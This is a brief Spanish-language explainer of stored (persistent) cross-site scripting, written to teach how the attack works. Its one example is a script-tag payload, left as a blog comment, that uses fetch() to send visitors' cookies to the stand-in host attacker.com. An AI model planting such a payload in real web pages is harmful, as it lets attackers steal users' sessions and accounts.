XSS almacenado

🔹 XSS almacenado (o persistente)

Resumen: El atacante inyecta un script malicioso en una aplicación web, y este queda guardado (por ejemplo, en una base de datos). Cada vez que un usuario carga esa página, el script se ejecuta automáticamente en su navegador.

Ejemplo: Un atacante deja un comentario como este en un blog:

<script>fetch('https://attacker.com/steal?cookie=' + document.cookie)</script>

Cuando otros usuarios ven ese comentario, el script se ejecuta y roba sus cookies.

---